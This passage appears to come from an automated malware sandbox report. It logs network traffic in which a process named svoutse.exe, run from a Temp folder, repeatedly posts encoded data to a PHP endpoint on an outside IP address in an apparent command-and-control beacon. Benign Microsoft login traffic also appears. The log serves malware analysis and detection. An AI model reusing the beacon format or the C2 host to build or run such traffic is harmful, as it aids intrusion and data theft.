Sep 6, 2024 10:00:05.997570992 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.7	51348	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:06.131031990 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 10:00:06.826986074 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.7	51349	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:06.839437008 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 10:00:07.908200979 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Sep 6, 2024 10:00:07.908257008 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.7	51350	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:08.029515028 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 10:00:08.724905014 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.7	51351	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:08.735969067 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 10:00:10.117835999 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Sep 6, 2024 10:00:10.117973089 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Sep 6, 2024 10:00:10.118180990 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.7	51352	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:10.247601032 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 10:00:10.936856985 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.7	51353	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:10.947312117 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 10:00:11.657363892 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.7	51354	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:11.771656990 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 10:00:12.485487938 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.7	51355	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:12.502656937 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 10:00:13.201971054 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.7	51356	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:13.348736048 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 10:00:14.042071104 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.7	51357	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:14.069536924 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 10:00:14.773997068 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.7	51358	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:14.899785042 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 10:00:15.591226101 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.7	51359	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:15.606513023 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 10:00:16.306015968 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.7	51360	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:16.430799961 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 10:00:17.132237911 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.7	51361	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:17.145220041 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 10:00:17.868093967 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.7	51363	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:17.986216068 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 10:00:18.678088903 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49702	20.190.160.22	443

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:57:53 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-09-06 07:57:53 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-09-06 07:57:53 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 06 Sep 2024 07:56:53 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C531_SN1 x-ms-request-id: 0781c0f8-fff9-4494-a9eb-0b296bf7c14b PPServer: PPV: 30 H: SN1PEPF0002F9F0 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 06 Sep 2024 07:57:53 GMT Connection: close Content-Length: 1276
2024-09-06 07:57:53 UTC	1276	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49703	20.190.160.22	443

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:57:54 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-09-06 07:57:54 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-09-06 07:57:55 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 06 Sep 2024 07:56:54 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C531_SN1 x-ms-request-id: 1e6e0f0e-a52c-4567-8d50-0747ce0a0b2a PPServer: PPV: 30 H: SN1PEPF0002F9B7 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 06 Sep 2024 07:57:54 GMT Connection: close Content-Length: 1276
2024-09-06 07:57:55 UTC	1276	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49704	20.190.160.22	443

Timestamp	Bytes transferred	Direction	Data
